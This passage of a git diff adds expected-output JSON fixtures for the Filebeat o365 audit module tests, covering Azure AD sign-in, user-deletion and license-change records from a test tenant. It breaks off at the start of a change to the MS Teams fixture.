"organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:08.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 37782, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:08", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "o365.audit.InterSystemsId": "f987e734-9f74-4996-8d75-6da73a443d22", + "o365.audit.IntraSystemId": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "o365.audit.ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "5f09333a-842c-47da-a157-57da27fcbca5", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:34.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 39044, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:34", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "o365.audit.InterSystemsId": "e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1", + "o365.audit.IntraSystemId": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "o365.audit.ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "5f09333a-842c-47da-a157-57da27fcbca5", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 40306, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "o365.audit.InterSystemsId": "17b096b5-881a-4d72-8268-4854f9aa8910", + "o365.audit.IntraSystemId": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "o365.audit.ObjectId": "00000002-0000-0ff1-ce00-000000000000", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0ff1-ce00-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-04T16:33:17.000Z", + "event.action": "deleted-user-account", + "event.category": "iam", + "event.code": "AzureActiveDirectory", + "event.dataset": "o365.audit", + "event.id": "1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "user", + "deletion" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 41567, + "o365.audit.Actor": [ + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "1003200112EB07E6", + "Type": 3 + }, + { + "ID": "User_21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.CreationTime": "2021-02-04T16:33:17", + "o365.audit.ExtendedProperties.additionalDetails": "{}", + "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User", + "o365.audit.Id": "1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd", + "o365.audit.InterSystemsId": "3e7b36e7-caba-4d7a-ae08-07f0a716135c", + "o365.audit.IntraSystemId": "995e2026-17cc-4599-8f63-b3f3556d784b", + "o365.audit.ModifiedProperties.Is_Hard_Deleted.NewValue": "False", + "o365.audit.ModifiedProperties.Is_Hard_Deleted.OldValue": "", + "o365.audit.ObjectId": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "o365.audit.Operation": "Delete user.", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 8, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "User_6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "10032001131B9761", + "Type": 3 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "1003200112EB07E6@testsiem4.onmicrosoft.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "root", + "6d4ca534c337474d8c766c715b31bc52newuser" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user.target.domain": "testsiem4.onmicrosoft.com", + "user.target.email": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "user.target.id": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "user.target.name": "6d4ca534c337474d8c766c715b31bc52newuser" + }, + { + "@timestamp": "2021-02-04T16:33:14.000Z", + "event.action": "Change user license.", + "event.category": "web", + "event.code": "AzureActiveDirectory", + "event.dataset": "o365.audit", + "event.id": "4a27de4c-a2dd-4825-8f7f-6a623b3060ec", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 43022, + "o365.audit.Actor": [ + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "1003200112EB07E6", + "Type": 3 + }, + { + "ID": "User_21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.CreationTime": "2021-02-04T16:33:14", + "o365.audit.ExtendedProperties.additionalDetails": "{}", + "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User", + "o365.audit.Id": "4a27de4c-a2dd-4825-8f7f-6a623b3060ec", + "o365.audit.InterSystemsId": "443c61f9-900a-46cd-906f-7de2d16bd7b0", + "o365.audit.IntraSystemId": "74634e79-78c4-4335-8776-8afc267f5329", + "o365.audit.ObjectId": "newuser@testsiem4.onmicrosoft.com", + "o365.audit.Operation": "Change user license.", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 8, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "User_6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "newuser@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "10032001131B9761", + "Type": 3 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "1003200112EB07E6@testsiem4.onmicrosoft.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:05:59.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoginFailed", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 44362, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:05:59", + "o365.audit.ErrorNumber": "50072", + "o365.audit.ExtendedProperties.RequestType": "Login:login", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.ExtendedProperties.UserAuthenticationMethod": "1", + "o365.audit.Id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.InterSystemsId": "9b4acea8-44ad-49f1-a9c3-88c075e8ba85", + "o365.audit.IntraSystemId": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.LogonError": "UserStrongAuthEnrollmentRequiredInterrupt", + "o365.audit.ObjectId": "00000002-0000-0000-c000-000000000000", + "o365.audit.Operation": "UserLoginFailed", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0000-c000-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:05:59.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoginFailed", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 45730, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:05:59", + "o365.audit.ErrorNumber": "50072", + "o365.audit.ExtendedProperties.RequestType": "Login:login", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.ExtendedProperties.UserAuthenticationMethod": "1", + "o365.audit.Id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.InterSystemsId": "9b4acea8-44ad-49f1-a9c3-88c075e8ba85", + "o365.audit.IntraSystemId": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.LogonError": "UserStrongAuthEnrollmentRequiredInterrupt", + "o365.audit.ObjectId": "00000002-0000-0000-c000-000000000000", + "o365.audit.Operation": "UserLoginFailed", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0000-c000-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 47098, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", + "o365.audit.IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.ObjectId": "Unknown", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "Unknown", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json index 3425c52aafa5..4d3bf4463fce 100644 --- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json @@ -1,8 +1,8 @@ [ { "@timestamp": "2020-02-17T16:59:44.000Z", - "event.action": "TeamCreated", - "event.category": "web", + "event.action": "added-group-account-to", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "49fa9883-50a9-4c9c-8e12-57e0948a9d8a", @@ -10,8 +10,12 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "creation" + ], "fileset.name": "audit", + "group.name": 